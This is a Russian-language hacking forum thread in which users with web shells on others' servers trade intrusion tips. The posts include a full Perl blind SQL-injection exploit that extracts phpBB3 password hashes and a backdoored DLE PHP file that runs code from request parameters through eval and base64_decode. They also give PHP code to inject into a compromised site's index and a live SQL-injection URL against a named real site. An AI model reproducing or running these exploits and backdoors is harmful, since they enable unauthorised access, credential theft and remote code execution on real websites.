ну раз шелл уже есть, причем здесь уже какая-то админка? PS: Могли поставить символическую ссылку, как это часто делают с phpmyadmin
2 GenTao: появляется ощущение, что ты с зеркалом разговариваешь: http://jack.kiev.ua/docs/slackbook/filesystem-structure-links.html
папка admin лежит на директорию выше директории сайта.А поддоменов,кстати,там 20+ )) В общем,не получится там я так понял,даже если инклудом достану).
Для ответа на все эти вопросы нужно понимать общий принцип работы скрипта. Какие переменные как формируются, куда и как подставлятся, примерные фильтры итд. Для этого нужно смотреть и анализировать коды. Разберёшься в этом - будет тебе счастье. Не разберёшься - можешь забить и искать "специальные программы" аля хакер интернета.
есть у меня щелл есть папки..например тест и в папке есть index.php admin.php config.php зна4eт 4то ето база сайта..а а каk знат домен ??
Тут много вариантов. Какие юзаю я: 1) тайтл 2) коннект к БД 3) Внедрение кода Первый способ: смотришь index.php ищещь <title>asdf9a</title> Вбиваешь asdf9a в google.com - первые 1-5 результатов попадается тот самый домен Второй способ: ищещь config.php или подобные(conf, cnf,хз как их ещё можно назвать) , Там есть строчки mysql_password mysql_login и куда подключаться: В шелле есть SQL: Вводишь логин\пароль и куда подключаться( в большинстве случаеB localhost ) И ищещь в табличках meta, keywords, title: Там по кеям или по другим признакам можно найти. Третий способ: (Нужны права редактирования index.* или default.* ,если нет index.* ) Втираешь туда код: PHP: <?php $file = 'security.txt'; //Файл, куда будем писать данные домена $domain = $_SERVER["HTTP_HOST"]; //уточните тут: php.su/learnphp/cgi/?cgivars //Создайте файл $file $fp = fopen($file, "a+"); fwrite($fp, $domain."\r\n"); fclose($fp); ?> Лучше создать файл lol.php и засунуть туда вышестоящий код. А в индекс PHP: <?php ...//Copyright by SMF/phpbb .../../....... include('lol.php'); //Ниже этот код загружающий код, ничего не меняйте Можно сделать и удалённую отправку Но мне хватало всегда первого способа PS: Использовано в условиях с шеллом, где сотни сайтов, всё гуд
Ребята помогите плиз!Кароче у меня есть эксплоит на phpBB3 я его запуская а там где MD5 : пусто что делать? или это форум пропатчен?
Code: #!/Perl/bin/perl # --------------------------------------------------------------- # phpBB 3 (Mod Tag Board <= 4) Remote Blind SQL Injection Exploit # by athos - staker[at]hotmail[dot]it # http://bx67212.netsons.org/forum/viewforum.php?f=3 # --------------------------------------------------------------- # Note: Works regardless PHP.ini settings! # Thanks meh also know as cHoBi # --------------------------------------------------------------- use strict; use LWP::UserAgent; my ($hash,$time1,$time2); my @chars = (48..57, 97..102); my $http = new LWP::UserAgent; my $host = shift; my $table = shift; my $myid = shift or &usage; sub injection { my ($sub,$char) = @_; return "/tag_board.php?mode=controlpanel&action=delete&id=". "1+and+(select+if((ascii(substring(user_password,${sub},1)". ")=${char}),benchmark(230000000,char(0)),0)+from+${table}_us". "ers+where+user_id=${myid})--"; } sub usage { print STDOUT "Usage: perl $0 [host] [table_prefix] [user_id]\n"; print STDOUT "Howto: perl $0 http://localhost/phpBB phpbb 2\n"; print STDOUT "by athos - staker[at]hotmail[dot]it\n"; exit; } syswrite(STDOUT,'Hash MD5: '); for my $i(1..33) { for my $j(0..16) { $time1 = time(); $http->get($host.injection($i,$chars[$j])); $time2 = time(); if($time2 - $time1 > 6) { syswrite(STDOUT,chr($chars[$j])); $hash .= chr($chars[$j]); last; } if($i == 1 && length $hash < 0) { syswrite(STDOUT,"Exploit Failed!\n"); exit; } } } # milw0rm.com [2008-12-08] Так же есть ещё и на php но там я незнаю как запустить ! А на perle оно думает потом выдаёт MD5 : и все!
Есть сайт на DLE 8.2. Под эту версию двига нашёл эксплойт. PHP: if($_GET['wert']==''){ require_once ROOT_DIR.'/language/'.$selected_language.'/adminpanel.lng'; $config['charset'] = ($lang['charset'] != '') ? $lang['charset'] : $config['charset']; @header("HTTP/1.0 200 OK"); @header("HTTP/1.1 200 OK"); @header("Cache-Control: no-cache, must-revalidate, max-age=0"); @header("Expires: 0"); @header("Pragma: no-cache"); @header("Content-type: text/css; charset=".$config['charset']); $data = @file_get_contents("http://www.dle-news.ru/extras/updates.php?version_id=".$_REQUEST['versionid']."&key=".$config['key']); if (!strlen($data)) echo $lang['no_update']; else echo $data; }else{ $file=(ROOT_DIR."/engine/classes/mysql.class.php"); if(file_exists($file)){ @require($file); $x.="mysql.class.php - ok<br />";} $file=(ROOT_DIR."/engine/data/dbconfig.php"); if(file_exists($file)){ @require($file); $x.="dbconfig.php - ok<br />";} $file=(ROOT_DIR."/engine/data/config.php"); if(file_exists($file)){ @require($file); $x.="config.php - ok<br />";} eval(base64_decode($_GET['user_id'])); echo <<<HTML <HTML><body><form action="" method="post"> <center><textarea name="text" rows="10" cols="100"></textarea> <br /><input type="submit" value="Canoinoaaoe"/></center></form></body></HTML> HTML; if($_POST['text']!=''){eval(stripcslashes($_POST['text'])); }} Только вот как его применить? Пробовал создавал форуму. PHP: <form method=post action="http://site.ru/engine/ajax/updates.php?wert=go" > <input type=text name=text> <input type=submit value=Отвправить></form> Помогите пожалуйста разобраться
разбирался со скриптом от Пашкелы и Электа для работы с SQLinj, возник вопросс перловским скриптом Электа: делая запрос: c:\mysql\public> c:\mysql\public\mssql_base_dump.pl -u "http://sait.com/section?php/section_id=20 ' " -w 3 после этого у меня тупо открывается текстовый файл mssql_base_dump, может кто сталкивался с такой проблемой?
http://pult.com.ua/tv.php?id=14558&world=0+and+extractvalue(1,concat(0x5c,(select+version())))--+ 5.1.35-log
приемные данные не фильтруются. Скрипт, как я понял, передает открыть сразу массив файлов, что невозможно. Либо просто убери ошибки, либо фильтруй. Разумеется, 2ое лучше.
Я новичок и вот прочтал про php инъекции. Пошарился в гугле и увидел такое: Часто неопытные программисты делают очень большие ошибки. Если например, открыть файл, не проверяя, существует ли он, то это будет очень большая дыра. Пример такой ошибки: include($_GET['page']); А как открыть сам php код?Просто я встретил сайт с php а как его открыть не знаю( Подскажите плиз)
